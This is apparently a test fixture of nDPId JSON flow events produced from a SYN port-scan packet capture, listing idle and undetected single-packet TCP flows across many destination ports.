+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":507,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7070,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":507,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":524,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7070,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":524,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1047,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5030,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1047,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5030,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5033,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5033,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":586,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2998,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":586,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":669,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2998,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":669,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":433,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":433,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":474,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":474,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5050,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5050,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1688,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1688,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":739,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5051,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":739,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5051,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1769,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1769,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":816,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5051,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":816,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5051,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":613,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":613,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1696,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3005,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1696,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":684,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":684,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1761,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3005,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1761,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1584,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5054,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1584,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5054,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":806,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3006,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 